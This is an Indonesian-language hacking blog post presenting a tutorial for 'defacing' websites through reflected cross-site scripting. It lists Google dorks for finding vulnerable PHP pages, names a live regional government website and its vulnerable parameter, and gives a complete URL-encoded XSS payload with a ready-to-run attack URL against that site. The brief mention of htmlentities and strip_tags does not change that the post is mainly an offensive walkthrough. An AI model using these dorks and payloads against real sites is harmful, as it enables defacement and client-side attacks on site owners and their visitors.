ExploitPedia

"Jangan Sampai ilmu Mengubah Sikapmu"

Breaking

Wednesday 21 December 2016

Home / Tutorial Deface / Deface Metode XSS Vulnerability | Warungdeface

Deface Metode XSS Vulnerability | Warungdeface

by on in

 Malam Ndan  Kali ini Saya akan Membahas Tentang "Deface Metode XSS"

Apa itu XSS?
---------------------------------------------------
XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.

XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

XSS yang paling banyak digunakan adalah jenis GET dan POST.
Salah satu contoh yang akan dibahas adalah jenis GET.

Mengatasi XSS
---------------------------------------------------
PHP sangat handal dalam melakukan konversi string dengan cepat. Tetapi jenis apa yang akan anda lakukan jika hal diatas terjadi?

Saya melakukan survey terhadap teman-teman programmer.
Tidak sedikit yang menjawab "Pakai saja htmlentities() atau strip_tags()"

htmlentities() memang dapat melakukan konversi tag-tag HTML, tetapi bagaimana dengan Javascript?

strip_tags() memang dapat melakukan konversi tag-tag HTML dan PHP dengan NULL byte, tetapi bagaimana dengan Javascript?

Ok langsung saja Ke TKP :v
 DORK :
inurl:"/showcatrows.php?CategoryID="
intext:"Website by Mile High Creative"
nurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
(Masih Banyak lagi Pakek Otak Mesum kalian) :v

Disini saya memakai Live Target  Hasil Scannan Mesin Tempurku Ini Juga Kebetulan Dapat Target XSS :D

Live Target : http://www.mentawaikab.go.id/
 Disini saya sudah dapat Celahnya Yaitu di Bagian /detil_isi.php?n

Tinggal masukin Script Javnya Deh :D

(TEXT KAMU)<%2Ftitle><body+bgcolor%3D"black"><center><marquee><b><font+color%3D"lime"><h1>TEXT KAMU<%2Fh1><%2Ffont><%2Fb><%2Fmarquee><br%2F><br%2F><b><font+color%3D"yellow">TEXT KAMU<%2Ffont><%2Fb><%2Fcenter><noscript><!--'))%2C%40)<marquee>K<%2Fmarquee><script>alert('TEXT KAMU')<%2Fscript>&id=6

Keterangan : 
Tulisan Berwarna Biru Ganti Sesuka Hati Kalian :D

(TEXT KAMU)<%2Ftitle> : Untuk Menambahkan Text pada <Title>
 
<body+bgcolor%3D"black"><center><marquee><b><font+color%3D"lime"> : Untuk Menambahkan Background Color & Efek Blank
 <h1>TEXT KAMU<%2Fh1><%2Ffont><%2Fb><%2Fmarquee><br%2F><br%2F> : Untuk Menambahkan Text Di bagian Headernya

<%2Fcenter><noscript><!--'))%2C%40)<marquee>K<%2Fmarquee><script>alert('TEXT KAMU')<%2Fscript>&id=6 : Untuk Menambahkan Text Di bagian Tengah Script.

EXECUTION 
Ok Tinggal di Eksekusi deh :D

  Contoh : www.targetmu.com/CelahXssnya>ScriptJavnya

 
http://www.mentawaikab.go.id//detil_isi.php?n=(TEXT KAMU)<%2Ftitle><body+bgcolor%3D"black"><center><marquee><b><font+color%3D"lime"><h1>TEXT KAMU<%2Fh1><%2Ffont><%2Fb><%2Fmarquee><br%2F><br%2F><b><font+color%3D"yellow">TEXT KAMU<%2Ffont><%2Fb><%2Fcenter><noscript><!--'))%2C%40)<marquee>K<%2Fmarquee><script>alert('TEXT KAMU')<%2Fscript>&id=6





 Ok Jadi Deh :D

Metode Deface Ini Bisa di sebut juga URL Poisoning, Metode ini tidak bisa Nebas INDEX Hanya Memanipulasi Di bagian URLnya Saja ...
Author Image

About Keisha Atha Santosa
Soratemplates is a blogger resources site is a provider of high quality blogger template with premium looking layout and robust design. The main mission of templatesyard is to provide the best quality blogger templates.

Related Posts:
By at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)